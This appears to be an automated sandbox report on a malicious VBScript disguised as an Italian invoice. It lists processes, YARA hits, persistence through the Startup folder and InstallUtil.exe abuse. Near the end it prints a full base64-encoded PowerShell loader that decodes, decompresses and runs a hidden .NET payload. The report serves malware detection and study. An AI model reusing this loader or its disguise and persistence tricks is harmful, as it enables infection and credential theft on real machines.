Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_06752F8F 9_2_06752F8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0675E4C0 9_2_0675E4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0675423C 9_2_0675423C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_06756238 9_2_06756238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_06752398 9_2_06752398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_06756C71 9_2_06756C71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_06756C80 9_2_06756C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_06756228 9_2_06756228
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_06756319 9_2_06756319
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0675BBF8 9_2_0675BBF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_06758167 9_2_06758167
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F176A 9_2_067F176A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F1FE0 9_2_067F1FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F6560 9_2_067F6560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F6D90 9_2_067F6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067FFBA0 9_2_067FFBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F4978 9_2_067F4978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F89A0 9_2_067F89A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067FDE21 9_2_067FDE21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F1FD0 9_2_067F1FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067FFC3C 9_2_067FFC3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067FD4A8 9_2_067FD4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F0D60 9_2_067F0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F654F 9_2_067F654F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F6D80 9_2_067F6D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F0A92 9_2_067F0A92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F0B3B 9_2_067F0B3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F0B9B 9_2_067F0B9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067FFB90 9_2_067FFB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F0040 9_2_067F0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F3810 9_2_067F3810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F98B8 9_2_067F98B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F4969 9_2_067F4969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F3920 9_2_067F3920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F3919 9_2_067F3919
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F79E0 9_2_067F79E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F79D0 9_2_067F79D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F7193 9_2_067F7193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_067F718A 9_2_067F718A
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_042DAA6C 15_2_042DAA6C
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_042DEA40 15_2_042DEA40
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_042DEDC8 15_2_042DEDC8
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_042DAA6C 15_2_042DAA6C
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CA0040 15_2_09CA0040
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CA0024 15_2_09CA0024
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CB0998 15_2_09CB0998
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CB0994 15_2_09CB0994
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CB5954 15_2_09CB5954
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CB5960 15_2_09CB5960
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CB5D2E 15_2_09CB5D2E
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CB0CB9 15_2_09CB0CB9
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CE1D70 15_2_09CE1D70
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CE2CA0 15_2_09CE2CA0
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CEF8A8 15_2_09CEF8A8
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CEF8B8 15_2_09CEF8B8
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_0A11E288 15_2_0A11E288
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_0A100007 15_2_0A100007
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_0A100040 15_2_0A100040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_01541C00 17_2_01541C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_01541978 17_2_01541978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_01541967 17_2_01541967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_015451D0 17_2_015451D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_015451C0 17_2_015451C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_01544870 17_2_01544870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_01543416 17_2_01543416
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_01541C00 17_2_01541C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_01541FCA 17_2_01541FCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_01541F94 17_2_01541F94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_01541FA9 17_2_01541FA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0154426C 17_2_0154426C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05602B68 17_2_05602B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05602B48 17_2_05602B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0565D768 17_2_0565D768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0565098D 17_2_0565098D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05659010 17_2_05659010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0565CF60 17_2_0565CF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05659000 17_2_05659000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_056A5D58 17_2_056A5D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_056AB820 17_2_056AB820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_056AA7BF 17_2_056AA7BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_056AB80F 17_2_056AB80F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_056AD8C1 17_2_056AD8C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_056AD8D0 17_2_056AD8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_057CB108 17_2_057CB108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_057C7C70 17_2_057C7C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_057C8D08 17_2_057C8D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_057C7F97 17_2_057C7F97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05AB74E0 17_2_05AB74E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05ABE1F2 17_2_05ABE1F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05AB9D28 17_2_05AB9D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05ABA940 17_2_05ABA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05ABD880 17_2_05ABD880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05ABFA00 17_2_05ABFA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05AB75F7 17_2_05AB75F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05AB7554 17_2_05AB7554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05AB74D0 17_2_05AB74D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05AB778F 17_2_05AB778F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05AB6668 17_2_05AB6668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05AB6658 17_2_05AB6658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05ABA070 17_2_05ABA070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05ABF9F1 17_2_05ABF9F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05AB7833 17_2_05AB7833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_05ABD87F 17_2_05ABD87F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_060BC0C8 17_2_060BC0C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_06221367 17_2_06221367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_06221378 17_2_06221378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_06227DE8 17_2_06227DE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_06227DD7 17_2_06227DD7
Java / VBScript file with very long strings (likely obfuscated code)
Source: Fattura-24SC-99245969925904728562.vbs Initial sample: Strings found which are bigger than 50
Sample file is different than original file name gathered from version info
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312120527.0000000000434000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1357497221.0000000002C09000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004DC6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005206000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameOwvaenanf.exe" vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004D71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe.4.dr Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Fattura-24SC-99245969925904728562.vbs
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2244
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2232
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2244 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2232 Jump to behavior
Yara signature match
Source: Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: OSDescription.vbs.exe PID: 6024, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: classification engine Classification label: mal100.bank.troj.spyw.expl.evad.winVBS@18/10@2/1
Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: \Sessions\1\BaseNamedObjects\c9d5959dd5627383
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05eouqb0.jr2.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs"
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000033F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Fattura-24SC-99245969925904728562.vbs ReversingLabs: Detection: 26%
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe File read: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs"
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" /Y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" /Y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQ